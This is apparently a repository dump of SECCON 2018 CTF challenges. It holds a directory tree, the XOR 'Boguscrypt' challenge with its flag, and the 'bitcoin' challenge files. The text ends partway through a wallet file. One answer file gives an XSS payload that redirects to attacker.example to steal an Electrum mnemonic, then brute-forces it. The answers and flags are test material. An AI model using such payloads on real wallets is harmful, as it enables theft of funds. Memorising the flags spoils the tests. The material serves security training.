├── Crypto
    ├── Boguscrypt
    │   ├── answer.txt
    │   ├── build
    │   │   ├── db.127
    │   │   ├── dec.c
    │   │   └── enc.c
    │   ├── files
    │   │   └── Boguscrypt.zip_3d8f4d6495e291543d48fcbdaccecf7127d16fae
    │   ├── flag.txt
    │   └── question.txt
    ├── bitcoin
    │   ├── answer.js
    │   ├── answer.txt
    │   ├── build
    │   │   ├── build.sh
    │   │   ├── client
    │   │   │   ├── .electrum
    │   │   │   │   ├── blockchain_headers
    │   │   │   │   ├── config
    │   │   │   │   ├── recent_servers
    │   │   │   │   └── wallets
    │   │   │   │   │   └── default_wallet
    │   │   │   ├── Dockerfile
    │   │   │   └── src
    │   │   │   │   ├── app.py
    │   │   │   │   ├── daemon.py
    │   │   │   │   ├── run.sh
    │   │   │   │   ├── servers.json
    │   │   │   │   ├── servers_testnet.json
    │   │   │   │   └── wallet.tgz
    │   │   ├── docker-compose.yaml
    │   │   └── server
    │   │   │   ├── flask
    │   │   │       ├── Dockerfile
    │   │   │       └── src
    │   │   │       │   ├── .bash_history
    │   │   │       │   ├── .python_history
    │   │   │       │   ├── app.py
    │   │   │       │   ├── static
    │   │   │       │       ├── wp-content
    │   │   │       │       │   ├── plugins
    │   │   │       │       │   │   ├── pirate-forms
    │   │   │       │       │   │   │   └── public
    │   │   │       │       │   │   │   │   ├── css
    │   │   │       │       │   │   │   │       └── front.css
    │   │   │       │       │   │   │   │   └── js
    │   │   │       │       │   │   │   │       ├── custom-spam.js
    │   │   │       │       │   │   │   │       └── scripts.js
    │   │   │       │       │   │   └── themeisle-companion
    │   │   │       │       │   │   │   └── obfx_modules
    │   │   │       │       │   │   │       ├── companion-legacy
    │   │   │       │       │   │   │           └── assets
    │   │   │       │       │   │   │           │   └── css
    │   │   │       │       │   │   │           │       └── hestia
    │   │   │       │       │   │   │           │           └── clients-bar.css
    │   │   │       │       │   │   │       └── menu-icons
    │   │   │       │       │   │   │           └── css
    │   │   │       │       │   │   │               └── public.css
    │   │   │       │       │   ├── themes
    │   │   │       │       │   │   └── hestia
    │   │   │       │       │   │   │   ├── assets
    │   │   │       │       │   │   │       ├── bootstrap
    │   │   │       │       │   │   │       │   ├── css
    │   │   │       │       │   │   │       │   │   └── bootstrap.min.css
    │   │   │       │       │   │   │       │   └── js
    │   │   │       │       │   │   │       │   │   └── bootstrap.min.js
    │   │   │       │       │   │   │       ├── css
    │   │   │       │       │   │   │       │   └── font-sizes.css
    │   │   │       │       │   │   │       ├── font-awesome
    │   │   │       │       │   │   │       │   └── css
    │   │   │       │       │   │   │       │   │   └── font-awesome.min.css
    │   │   │       │       │   │   │       └── js
    │   │   │       │       │   │   │       │   ├── material.js
    │   │   │       │       │   │   │       │   └── scripts.js
    │   │   │       │       │   │   │   └── style.css
    │   │   │       │       │   └── uploads
    │   │   │       │       │   │   └── 2018
    │   │   │       │       │   │       └── 09
    │   │   │       │       │   │           ├── animal-cold-color-416118.jpg
    │   │   │       │       │   │           ├── fig-6-e1536639090614.png
    │   │   │       │       │   │           └── url.txt
    │   │   │       │       └── wp-includes
    │   │   │       │       │   ├── css
    │   │   │       │       │       └── dashicons.min.css
    │   │   │       │       │   └── js
    │   │   │       │       │       └── jquery
    │   │   │       │       │           ├── jquery-migrate.min.js
    │   │   │       │       │           ├── jquery.js
    │   │   │       │       │           └── ui
    │   │   │       │       │               └── core.min.js
    │   │   │       │   └── templates
    │   │   │       │       ├── index.html
    │   │   │       │       ├── message.html
    │   │   │       │       └── message2.html
    │   │   │   └── nginx
    │   │   │       └── conf.d
    │   │   │           └── webapp.conf
    │   ├── flag.txt
    │   └── question.txt
    ├── ether
    │   ├── answer.txt
    │   ├── build
    │   │   ├── build.txt
    │   │   ├── miner
    │   │   │   ├── Dockerfile
    │   │   │   ├── docker-compose.yaml
    │   │   │   └── src
    │   │   │   │   ├── UTC--2018-09-21T08-13-18.619300810Z--0d7134fe1fff95780f05c6751dc4514cdf0134e7
    │   │   │   │   ├── cmd.sh
    │   │   │   │   └── genesis.json
    │   │   └── server
    │   │   │   ├── docker-compose.yaml
    │   │   │   ├── etherver
    │   │   │       ├── Dockerfile
    │   │   │       └── src
    │   │   │       │   ├── UTC--2018-09-21T08-13-18.619300810Z--0d7134fe1fff95780f05c6751dc4514cdf0134e7
    │   │   │       │   ├── app.py
    │   │   │       │   ├── cmd.sh
    │   │   │       │   ├── genesis.json
    │   │   │       │   ├── sol
    │   │   │       │       ├── deploy.sh
    │   │   │       │       ├── deploy.txt
    │   │   │       │       ├── lv1
    │   │   │       │       │   ├── Gacha-abi.txt
    │   │   │       │       │   ├── Gacha-bytecode.txt
    │   │   │       │       │   ├── Gacha.sol
    │   │   │       │       │   ├── GachaFactory-abi.txt
    │   │   │       │       │   ├── GachaFactory-bytecode.txt
    │   │   │       │       │   └── GachaFactory.sol
    │   │   │       │       └── lv2
    │   │   │       │       │   ├── Gacha2.sol
    │   │   │       │       │   └── GachaFactory2.sol
    │   │   │       │   └── static-nodes.json
    │   │   │   ├── flask
    │   │   │       ├── Dockerfile
    │   │   │       └── src
    │   │   │       │   ├── .bash_history
    │   │   │       │   ├── .python_history
    │   │   │       │   ├── Gacha.sol
    │   │   │       │   ├── Gacha2.sol
    │   │   │       │   ├── __pycache__
    │   │   │       │       └── app.cpython-37.pyc
    │   │   │       │   ├── app.py
    │   │   │       │   ├── db.json
    │   │   │       │   ├── shell.py
    │   │   │       │   ├── static
    │   │   │       │       ├── circle.gif
    │   │   │       │       ├── lottery.js
    │   │   │       │       ├── signin.css
    │   │   │       │       └── style.css
    │   │   │       │   └── templates
    │   │   │       │       ├── home.html
    │   │   │       │       └── index.html
    │   │   │   └── nginx
    │   │   │       └── conf.d
    │   │   │           └── webapp.conf
    │   ├── flag.txt
    │   └── question.txt
    ├── ether2
    │   ├── answer.txt
    │   ├── flag.txt
    │   └── question.txt
    └── mnemonic
    │   ├── answer.js
    │   ├── flag.txt
    │   └── question.txt
├── Forensics
    ├── History
    │   ├── answer.txt
    │   ├── build
    │   │   └── J
    │   ├── files
    │   │   └── J.zip_4c7050d70c9077b8c94ce0d76effcb8676bed3ba
    │   ├── flag.txt
    │   └── question.txt
    └── Unzip
    │   ├── answer.txt
    │   ├── build
    │       ├── flag.txt
    │       ├── flag.zip
    │       ├── key
    │       └── makefile.sh
    │   ├── exploit.py
    │   ├── files
    │       └── unzip.zip_26c0cb5b40e9f78641ae44229cda45529418183f
    │   ├── flag.txt
    │   └── question.txt
├── Media
    └── Needle_in_a_haystack
    │   ├── 47601075-3a71de00-da06-11e8-90a3-2a043017b42d.png
    │   ├── answer.txt
    │   ├── flag.txt
    │   └── question.txt
├── Pwn
    ├── CLV2
    │   ├── README.md
    │   ├── build
    │   │   ├── compile.sh
    │   │   ├── main.c
    │   │   └── sha256.h
    │   ├── exploit.py
    │   ├── files
    │   │   ├── CLV2.tar.gz_f0c6c1a6b8ae7cff168c8b506fb69dbede6665d7
    │   │   └── README.md
    │   ├── flag.txt
    │   └── questions.txt
    ├── classic
    │   ├── build
    │   │   └── classic.c
    │   ├── exploit.py
    │   ├── files
    │   │   ├── classic_aa9e979fd5c597526ef30c003bffee474b314e22
    │   │   └── libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253
    │   ├── flag.txt
    │   └── question.txt
    ├── internet_of_seat
    │   ├── build
    │   │   ├── .gitignore
    │   │   ├── Makefile
    │   │   ├── build.sh
    │   │   ├── main
    │   │   ├── main.c
    │   │   └── piCore.gz
    │   ├── exploit.py
    │   ├── files
    │   │   ├── README.md
    │   │   └── files.zip_0b0c98eb5f5f7d7127eb3727ae97efb1a9740b70
    │   ├── flag.txt
    │   └── question.txt
    ├── kindvm
    │   ├── answer.txt
    │   ├── build
    │   │   ├── Makefile
    │   │   ├── banner.txt
    │   │   ├── hint1.txt
    │   │   ├── hint2.txt
    │   │   ├── hint3.txt
    │   │   ├── kindvm.c
    │   │   ├── kindvm.h
    │   │   ├── main.c
    │   │   ├── util.c
    │   │   └── util.h
    │   ├── exploit.py
    │   ├── files
    │   │   └── kindvm_79726158fec11eb1e5a89351db017e13506d3a4a
    │   ├── flag.txt
    │   └── question.txt
    ├── painter
    │   ├── answer.txt
    │   ├── build
    │   │   ├── .gitignore
    │   │   ├── Makefile
    │   │   ├── bmp.cc
    │   │   ├── bmp.h
    │   │   ├── bmp.o
    │   │   ├── commands.cc
    │   │   ├── commands.h
    │   │   ├── commands.o
    │   │   ├── main.cc
    │   │   ├── main.h
    │   │   ├── main.o
    │   │   └── painter
    │   ├── exploit.py
    │   ├── files
    │   │   ├── README.md
    │   │   └── painter.zip_45a35d4edf812a8919c0558558ef5fb6f7b8f694
    │   ├── flag.txt
    │   └── question.txt
    ├── profile
    │   ├── build
    │   │   └── profile.cpp
    │   ├── exploit.py
    │   ├── files
    │   │   ├── libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253
    │   │   └── profile_e814c1a78e80ed250c17e94585224b3f3be9d383
    │   ├── flag.txt
    │   └── question.txt
    ├── q-escape
    │   ├── README.md
    │   ├── build
    │   │   └── cydf_vga.c
    │   ├── exp.gz
    │   ├── exploit.py
    │   ├── files
    │   │   ├── README.md
    │   │   └── q-escape.tar.gz_48901602a841daf68b60926a26efd4a80ad66c4c
    │   ├── flag.txt
    │   ├── poc.c
    │   └── question.txt
    ├── secret_message
    │   ├── README.md
    │   ├── build
    │   │   ├── Makefile
    │   │   ├── cipher.cpp
    │   │   ├── cipher.h
    │   │   ├── cylib.cpp
    │   │   ├── cylib.h
    │   │   ├── cystruct.h
    │   │   └── main.cpp
    │   ├── ex_helper1
    │   ├── ex_helper2
    │   ├── exploit.py
    │   ├── files
    │   │   └── secret_message.tar.gz_886d5d76439d30bd4dfbb5f3e4a0d78611c78f72
    │   ├── flag.txt
    │   └── question.txt
    └── simple_memo
    │   ├── build
    │       └── memo.c
    │   ├── exploit.bin
    │   ├── exploit.c
    │   ├── exploit.py
    │   ├── files
    │       ├── libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253
    │       └── memo_ba2e54eda5aca5ca5c187a3e0603d4ce623aee62
    │   ├── flag.txt
    │   └── question.txt
├── QR
    └── QRChecker
    │   ├── answer.txt
    │   ├── build
    │       ├── flag
    │       ├── qr.cgi
    │       └── readme
    │   ├── exploit.jpg
    │   ├── files
    │       └── qr.cgi_93bb1a11da93ab2a50e61c7da1e62b34d316bc9b
    │   ├── flag.txt
    │   └── question.txt
├── README.md
├── Reversing
    ├── Runme
    │   ├── answer.txt
    │   ├── build
    │   │   ├── create.py
    │   │   └── runme.asm
    │   ├── files
    │   │   └── runme.exe_b834d0ce1d709affeedb1ee4c2f9c5d8ca4aac68
    │   ├── flag.txt
    │   └── question.txt
    ├── block
    │   ├── answer.txt
    │   ├── builds
    │   │   ├── flag.png
    │   │   ├── rotation.cs
    │   │   └── shader.shader
    │   ├── files
    │   │   └── block.apk_f2f0a7d6a3b3e940ca7cd5a3f7c5045eb57f92cf
    │   ├── flag.txt
    │   └── question.txt
    ├── shooter
    │   ├── answer.txt
    │   ├── build
    │   │   ├── app
    │   │   │   └── scripts
    │   │   │   │   ├── Config.cs
    │   │   │   │   ├── GameDirector.cs
    │   │   │   │   ├── PlaneController.cs
    │   │   │   │   └── PlaneGenerator.cs
    │   │   └── server
    │   │   │   ├── nginx
    │   │   │       ├── conf.d
    │   │   │       │   ├── default
    │   │   │       │   ├── develop.shooter.pwn.seccon.jp
    │   │   │       │   ├── shooter.pwn.seccon.jp
    │   │   │       │   └── staging.shooter.pwn.seccon.jp
    │   │   │       └── nginx.conf
    │   │   │   └── shooter
    │   │   │       ├── app
    │   │   │           ├── assets
    │   │   │           │   ├── config
    │   │   │           │   │   └── manifest.js
    │   │   │           │   ├── images
    │   │   │           │   │   └── .keep
    │   │   │           │   ├── javascripts
    │   │   │           │   │   ├── application.js
    │   │   │           │   │   ├── cable.js
    │   │   │           │   │   └── channels
    │   │   │           │   │   │   └── .keep
    │   │   │           │   └── stylesheets
    │   │   │           │   │   └── application.scss
    │   │   │           ├── channels
    │   │   │           │   └── application_cable
    │   │   │           │   │   ├── channel.rb
    │   │   │           │   │   └── connection.rb
    │   │   │           ├── controllers
    │   │   │           │   ├── admin
    │   │   │           │   │   ├── dashboards_controller.rb
    │   │   │           │   │   ├── sessions_controller.rb
    │   │   │           │   │   ├── system_configs_controller.rb
    │   │   │           │   │   └── users_controller.rb
    │   │   │           │   ├── admin_controller.rb
    │   │   │           │   ├── api
    │   │   │           │   │   └── v1
    │   │   │           │   │   │   └── scores_controller.rb
    │   │   │           │   ├── api_controller.rb
    │   │   │           │   ├── application_controller.rb
    │   │   │           │   └── concerns
    │   │   │           │   │   └── .keep
    │   │   │           ├── helpers
    │   │   │           │   └── application_helper.rb
    │   │   │           ├── javascript
    │   │   │           │   └── packs
    │   │   │           │   │   └── application.js
    │   │   │           ├── jobs
    │   │   │           │   └── application_job.rb
    │   │   │           ├── mailers
    │   │   │           │   └── application_mailer.rb
    │   │   │           ├── models
    │   │   │           │   ├── application_record.rb
    │   │   │           │   ├── concerns
    │   │   │           │   │   └── .keep
    │   │   │           │   ├── flag.rb
    │   │   │           │   ├── manager.rb
    │   │   │           │   └── score.rb
    │   │   │           └── views
    │   │   │           │   ├── admin
    │   │   │           │       ├── dashboards
    │   │   │           │       │   └── index.html.slim
    │   │   │           │       ├── index.html.slim
    │   │   │           │       ├── sessions
    │   │   │           │       │   └── new.html.slim
    │   │   │           │       ├── system_configs
    │   │   │           │       │   └── show.html.slim
    │   │   │           │       └── users
    │   │   │           │       │   └── index.html.slim
    │   │   │           │   └── layouts
    │   │   │           │       ├── application.html.slim
    │   │   │           │       ├── mailer.html.slim
    │   │   │           │       └── mailer.text.slim
    │   │   │       ├── config
    │   │   │           └── routes.rb
    │   │   │       └── db
    │   │   │           ├── migrate
    │   │   │               ├── 20181008083436_create_scores.rb
    │   │   │               ├── 20181008134533_create_managers.rb
    │   │   │               └── 20181008142316_create_flags.rb
    │   │   │           ├── schema.rb
    │   │   │           └── seeds.rb
    │   ├── files
    │   │   └── shooter.apk_d0d2ed9e7ba3c83354cbbf7ccf82541730b14a72
    │   ├── flag.txt
    │   └── question.txt
    ├── special_device
    │   ├── answer.txt
    │   ├── build
    │   │   ├── build.txt
    │   │   ├── build
    │   │   │   └── cross-gcc494
    │   │   │   │   ├── KL-01
    │   │   │   │   ├── LICENSE
    │   │   │   │   ├── README.txt
    │   │   │   │   ├── config.sh
    │   │   │   │   └── exec
    │   │   │   │       ├── Makefile
    │   │   │   │       ├── aarch64-elf.c
    │   │   │   │       ├── aarch64-elf.d
    │   │   │   │       ├── aarch64-elf.o
    │   │   │   │       ├── aarch64-elf.s
    │   │   │   │       ├── aarch64-elf.x
    │   │   │   │       ├── ld.scr
    │   │   │   │       ├── lib-aarch64-elf.S
    │   │   │   │       ├── sample.c
    │   │   │   │       └── syscall.h
    │   │   ├── patch
    │   │   │   ├── patch-gdb-8.2-aarch64-random.txt
    │   │   │   └── patch-gdb-8.2-log2.txt
    │   │   └── test
    │   │   │   ├── Makefile
    │   │   │   └── sample.c
    │   ├── files
    │   │   └── runme_8a10b7425cea81a043db0fd352c82a370a2d3373
    │   ├── flag.txt
    │   └── question.txt
    ├── special_instractions
    │   ├── answer.txt
    │   ├── build
    │   │   ├── build.txt
    │   │   ├── build
    │   │   │   └── cross-gcc494
    │   │   │   │   ├── KL-01
    │   │   │   │   ├── LICENSE
    │   │   │   │   ├── README.txt
    │   │   │   │   ├── config.sh
    │   │   │   │   └── exec
    │   │   │   │       ├── Makefile
    │   │   │   │       ├── ld.scr
    │   │   │   │       ├── lib-moxie-elf.S
    │   │   │   │       ├── moxie-elf.c
    │   │   │   │       ├── moxie-elf.d
    │   │   │   │       ├── moxie-elf.o
    │   │   │   │       ├── moxie-elf.s
    │   │   │   │       ├── moxie-elf.x
    │   │   │   │       ├── sample.c
    │   │   │   │       └── syscall.h
    │   │   ├── patch
    │   │   │   ├── patch-gdb-8.2-log2.txt
    │   │   │   ├── patch-gdb-8.2-moxie-nodtb.txt
    │   │   │   └── patch-gdb-8.2-moxie-random.txt
    │   │   └── test
    │   │   │   ├── Makefile
    │   │   │   └── sample.c
    │   ├── files
    │   │   └── runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be
    │   ├── flag.txt
    │   └── question.txt
    └── tctkToy
    │   ├── answer.txt
    │   ├── build
    │       ├── tctkToy.sln
    │       └── tctkToy
    │       │   ├── Resource.h
    │       │   ├── small.ico
    │       │   ├── stdafx.cpp
    │       │   ├── stdafx.h
    │       │   ├── targetver.h
    │       │   ├── tctkInfo.bmp
    │       │   ├── tctkToy.aps
    │       │   ├── tctkToy.cpp
    │       │   ├── tctkToy.h
    │       │   ├── tctkToy.ico
    │       │   ├── tctkToy.rc
    │       │   ├── tctkToy.vcxproj
    │       │   ├── tctkToy.vcxproj.filters
    │       │   └── tctkToy.vcxproj.user
    │   ├── files
    │       ├── 66da8fc7dd320bbd14a9ebba148402754d591e33
    │       └── file.zip_5bd5bdb6eaf308b509af1c466b8a76578b75cdd9
    │   ├── flag.txt
    │   └── question.txt
└── Web
    └── GhostKingdom
        ├── answer.txt
        ├── exploit(private).jpg
        ├── exploit(private).pl
        ├── flag.txt
        └── question.txt


/Crypto/Boguscrypt/answer.txt:
--------------------------------------------------------------------------------
1 | the file encryption is very easy - it's XOR - but challenge should get the encryption key with DNS Reverse lookup.
2 | I saved a DNS query packets in the PCAP file, because the query answer have possibility that the entry will change by DNS logics if query from internet.
3 | 
4 | So, Challenger can find a query that reverse lookup of 127.0.0.2 from PCAP file, and decrypt the file with the result.
5 | 


--------------------------------------------------------------------------------
/Crypto/Boguscrypt/build/db.127:
--------------------------------------------------------------------------------
 1 | ;
 2 | ; BIND reverse data file for local loopback interface
 3 | ;
 4 | $TTL	604800
 5 | @	IN	SOA	localhost. root.localhost. (
 6 | 			      2		; Serial
 7 | 			 604800		; Refresh
 8 | 			  86400		; Retry
 9 | 			2419200		; Expire
10 | 			 604800 )	; Negative Cache TTL
11 | ;
12 | @	IN	NS	localhost.
13 | 1.0.0	IN	PTR	localhost.
14 | 2.0.0	IN	PTR	cur10us4ndl0ngh0stn4m3.
15 | 


--------------------------------------------------------------------------------
/Crypto/Boguscrypt/build/dec.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdlib.h>
 3 | #include <unistd.h>
 4 | #include <sys/types.h>
 5 | #include <fcntl.h>
 6 | #include <sys/socket.h>
 7 | #include <netinet/in.h>
 8 | #include <netdb.h>
 9 | 
10 | 
11 | 
12 | 
13 | 
14 | main()
15 | {
16 |   char *a;
17 |   char mp[2048];
18 |   char to[2048];
19 |   char to2[2048];
20 |   int len;
21 |   int fd;
22 |   int fd2;
23 |   struct stat statbuf;
24 | 
25 |   struct hostent *host;
26 |   struct in_addr addr;
27 |   char *h;
28 |   char revh[2048];
29 |   int maxlen;
30 |   int llen;
31 | 
32 |   printf("Key?:");
33 |   scanf("%s", a);
34 | 
35 |   addr.s_addr = 0x0200007f;
36 |   host = gethostbyaddr((const char *)&addr.s_addr,
37 |                        sizeof(addr.s_addr), AF_INET);
38 |   if (host == NULL) {
39 |     herror("gethostbyaddr");
40 |     return 1;
41 |   }
42 | 
43 | //  printf("%s\n", host->h_name);
44 | 
45 |   h = host->h_name;
46 |   maxlen = strlen(h);
47 |   for(llen = 0; llen < maxlen; llen++)
48 |   {
49 |     revh[maxlen - llen -1] = h[llen];
50 |   }
51 | 
52 |   memset(mp, 0, 2048);
53 |   memset(to, 0, 2048);
54 |   memset(to2, 0, 2048);
55 |   fd = open("flag.txt.encrypted", O_RDWR);
56 |   fstat(fd, &statbuf);
57 |   len = statbuf.st_size;
58 | 
59 |   read(fd, mp, len);
60 | //  write(2, mp, 2048);
61 |   close(fd);
62 |   len = strlen(mp);
63 | 
64 |   dec(mp, to, len, revh);
65 |   fd2 = open("flag.txt", O_CREAT|O_RDWR,S_IRUSR|S_IWUSR);
66 |   write(fd2, to, len);
67 |   close(fd2);
68 |   dec(to, to2, 2048, "abc");
69 | //  write(2, mp, 2048);
70 | //  write(2, to2, 2048);
71 | //  write(2, to, 2048);
72 | }
73 | 
74 | void dec(char *from, char *to, int length, char *key)
75 | {
76 | 	char *deckey;
77 | 	int keylength;
78 | 	int l;
79 | 	deckey = key;
80 | 	keylength = strlen(key);
81 | 
82 | 	for(l = 0; l < length; l++)
83 | 	{
84 | 		to[l] = from[l] ^ deckey[l%keylength];
85 | 	}
86 | }
87 | 


--------------------------------------------------------------------------------
/Crypto/Boguscrypt/build/enc.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdlib.h>
 3 | #include <unistd.h>
 4 | #include <sys/types.h>
 5 | #include <fcntl.h>
 6 | #include <sys/socket.h>
 7 | #include <netinet/in.h>
 8 | #include <netdb.h>
 9 | 
10 | 
11 | 
12 | 
13 | 
14 | main()
15 | {
16 |   char *a;
17 |   char mp[2048];
18 |   char to[2048];
19 |   char to2[2048];
20 |   int len;
21 |   int fd;
22 |   int fd2;
23 | 
24 |   struct hostent *host;
25 |   struct in_addr addr;
26 |   char *h;
27 |   char revh[2048];
28 |   int maxlen;
29 |   int llen;
30 | 
31 | //  printf("Key?:");
32 | //  scanf("%s", a);
33 | 
34 |   addr.s_addr = 0x0200007f;
35 |   host = gethostbyaddr((const char *)&addr.s_addr,
36 |                        sizeof(addr.s_addr), AF_INET);
37 |   if (host == NULL) {
38 |     herror("gethostbyaddr");
39 |     return 1;
40 |   }
41 | 
42 | //  printf("%s\n", host->h_name);
43 | 
44 |   h = host->h_name;
45 |   maxlen = strlen(h);
46 |   for(llen = 0; llen < maxlen; llen++)
47 |   {
48 |     revh[maxlen - llen -1] = h[llen];
49 |   }
50 | 
51 |   memset(mp, 0, 2048);
52 |   memset(to, 0, 2048);
53 |   memset(to2, 0, 2048);
54 |   fd = open("data.dat", O_RDWR);
55 |   read(fd, mp, 2048);
56 | //  write(2, mp, 2048);
57 |   close(fd);
58 |   len = strlen(mp);
59 | 
60 |   enc(mp, to, len, revh);
61 |   fd2 = open("flag.txt.encrypted", O_CREAT|O_RDWR,S_IRUSR|S_IWUSR);
62 |   write(fd2, to, len);
63 |   close(fd2);
64 |   dec(to, to2, 2048, "abc");
65 | //  write(2, mp, 2048);
66 | //  write(2, to2, 2048);
67 | //  write(2, to, 2048);
68 | }
69 | 
70 | void enc(char *from, char *to, int length, char *key)
71 | {
72 | 	char *enckey;
73 | 	int keylength;
74 | 	int l;
75 | 	enckey = key;
76 | 	keylength = strlen(key);
77 | 
78 | 	for(l = 0; l < length; l++)
79 | 	{
80 | 		to[l] = from[l] ^ enckey[l%keylength];
81 | 	}
82 | }
83 | 
84 | void dec(char *from, char *to, int length, char *key)
85 | {
86 | 	char *deckey;
87 | 	int keylength;
88 | 	int l;
89 | 	deckey = key;
90 | 	keylength = strlen(key);
91 | 
92 | 	for(l = 0; l < length; l++)
93 | 	{
94 | 		to[l] = from[l] ^ deckey[l%keylength];
95 | 	}
96 | }
97 | 


--------------------------------------------------------------------------------
/Crypto/Boguscrypt/files/Boguscrypt.zip_3d8f4d6495e291543d48fcbdaccecf7127d16fae:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Crypto/Boguscrypt/files/Boguscrypt.zip_3d8f4d6495e291543d48fcbdaccecf7127d16fae


--------------------------------------------------------------------------------
/Crypto/Boguscrypt/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{This flag is encoded by bogus routine}
2 | 


--------------------------------------------------------------------------------
/Crypto/Boguscrypt/question.txt:
--------------------------------------------------------------------------------
1 | Boguscrypto
2 | 
3 | Hey, Can you decrypt the file?


--------------------------------------------------------------------------------
/Crypto/bitcoin/answer.js:
--------------------------------------------------------------------------------
 1 | let bip39 = require('bip39');
 2 | let crypto = require('crypto');
 3 | let wordlist_jp = bip39.wordlists["english"];
 4 | let question = new Buffer.from('Pz8/IHdlYWx0aCBicmVhZCBzcXVpcnJlbCBzb3J0IHVyYmFuIHBhZGRsZSBwYW5pYyBjb21wYW55IG1hdGVyaWFsIGJ1dHRlciB0aWx0IGNpdHkgaG9iYnkgc2V2ZW4gc2FtcGxlIGNhdXRpb24gaXZvcnkgY3VwIGJlY2F1c2UgcGllY2UgY3JpbWUgbWl4dHVyZSBhcnR3b3Jr', "base64").toString('ascii');
 5 | 
 6 | let questionArr = question.split(" ");
 7 | let arr = [];
 8 | for (let i=0; i < wordlist_jp.length; i++){
 9 |     questionArr[0] = wordlist_jp[i];
10 |     let mnemonic = questionArr.join(' ');
11 |     if (bip39.validateMnemonic(mnemonic, wordlist_jp)){
12 | 	let entropy = bip39.mnemonicToEntropy(mnemonic, wordlist_jp)
13 | 	if("583" == entropy.slice(0,3)){
14 | 	    md5 = crypto.createHash('md5');
15 | 	    console.log("SECCON{"+md5.update(entropy, 'binary').digest('hex')+"}");
16 | 	}
17 |     }
18 | }
19 | 


--------------------------------------------------------------------------------
/Crypto/bitcoin/answer.txt:
--------------------------------------------------------------------------------
 1 | The vulnerable client is subject to https://github.com/dleshem/electrumizer.
 2 | 
 3 | 1. prepare electrumizer on an attacker's server.
 4 | 2. send ```</textarea><script>window.location("http://attacker.example/electrumizer")``` to steal the mnemonic
 5 | 3. bruteforce it to recover the entropy.
 6 | 
 7 | ---
 8 | 
 9 | mnemonic: flag wealth bread squirrel sort urban paddle panic company material butter tilt city hobby seven sample caution ivory cup because piece crime mixture artwork
10 | entropy: 583f046de9dcf9dea7b4fd2e911c7d710296d8b12df824aedcd689ea46672390
11 | md5: 2e36c3919822de3223e55efd8425f055
12 | 


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/build.sh:
--------------------------------------------------------------------------------
1 | 
2 | docker-compose build
3 | docker-compose up -d
4 | 


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/client/.electrum/blockchain_headers:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Crypto/bitcoin/build/client/.electrum/blockchain_headers


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/client/.electrum/config:
--------------------------------------------------------------------------------
 1 | {
 2 |     "auto_connect": true,
 3 |     "console-history": [],
 4 |     "gui_last_wallet": "/home/wallet/.electrum/wallets/default_wallet",
 5 |     "is_maximized": false,
 6 |     "recently_open": [
 7 |         "/home/wallet/.electrum/wallets/default_wallet"
 8 |     ]
 9 | }
10 | 


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/client/.electrum/recent_servers:
--------------------------------------------------------------------------------
1 | [
2 |     "127.0.0.1:50002:s"
3 | ]
4 | 


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/client/.electrum/wallets/default_wallet:
--------------------------------------------------------------------------------
 1 | {
 2 |     "addr_history": {
 3 |         "12GWR4eZdm4cc7ZqEcchenFYabcc6SDGi6": [],
 4 |         "14ukDtQXNDmuG2gECf6KDZAhW2pkzSsqKb": [],
 5 |         "14vJkTcV9UCWwnoioBwz4db1HqHppwaVdd": [],
 6 |         "15P6BEAb7m3GP6r5xEoXGEubMd477kCEAc": [],
 7 |         "167ooCHygXruMFucapaK7Ervyutk2Vzx27": [],
 8 |         "16EzzWDfi4TMZMxH2wUHkPXdfUhdKZ3X9x": [],
 9 |         "16uHaTPPMJGzFafRpNUsHJL11LFJNVQMa5": [],
10 |         "16yMi4o6VfxyTC5nNmUZRmyV9kbZs822Fy": [],
11 |         "171UB1uZjGmDLsmaNMDWrRCeRf6855ZiPm": [],
12 |         "196x9ZiHn8WDvubpSaHvNvdadcCnUZiwgR": [],
13 |         "19Fgx54Bbqp6r3T21W4affAmDx7Y7SubXc": [],
14 |         "19X7CS79mABu6UhAW9K1d1J1xWhy6jiwH": [],
15 |         "1APA8CFhaZqaP875PB6AVmyQ1DnFrp5PJK": [],
16 |         "1BV8rd9W8Woq8Nzzkv5MLYAPYzuRZAwddL": [],
17 |         "1BVToDBPVaNh28djPvMPTmXzuaxPdc53J7": [],
18 |         "1BYAKa93uezv3YAfPEaSVvNkJwd48qHWSw": [],
19 |         "1CSDiadHUV9rtYYBmTCW2XwaFfLQsSuEfq": [],
20 |         "1ER2i9urSAqzV3pvNsSrUQJXFt2DKwBtF9": [],
21 |         "1Eb39MmbAuAt1d45hNZ1am6UsUYzjCBV34": [],
22 |         "1FHz3d3snY4WNfJp3LDgqPrh8CFTmKQdo1": [],
23 |         "1Jq5ymj5MVv471gWjNywgxsdNob46gk6WW": [],
24 |         "1KVQzLShuDYZVLD7Es2uuUQ7abWhMXaEZ4": [],
25 |         "1Kk1mWSpR5X2P6wtG8RhJ9QitrDFYhsyTt": [],
26 |         "1Njs5MfjRaCBd1rCPYbPDCKkDzc8EnPWL1": [],
27 |         "1PdrtFGgMtUcbmL7G9bximXTNzRQtctceV": [],
28 |         "1QDMhwEb8wMPhfNPnZiqtSo9vqUHbTerhF": []
29 |     },
30 |     "addresses": {
31 |         "change": [
32 |             "14vJkTcV9UCWwnoioBwz4db1HqHppwaVdd",
33 |             "1BV8rd9W8Woq8Nzzkv5MLYAPYzuRZAwddL",
34 |             "19Fgx54Bbqp6r3T21W4affAmDx7Y7SubXc",
35 |             "1Njs5MfjRaCBd1rCPYbPDCKkDzc8EnPWL1",
36 |             "1APA8CFhaZqaP875PB6AVmyQ1DnFrp5PJK",
37 |             "16EzzWDfi4TMZMxH2wUHkPXdfUhdKZ3X9x"
38 |         ],
39 |         "receiving": [
40 |             "1ER2i9urSAqzV3pvNsSrUQJXFt2DKwBtF9",
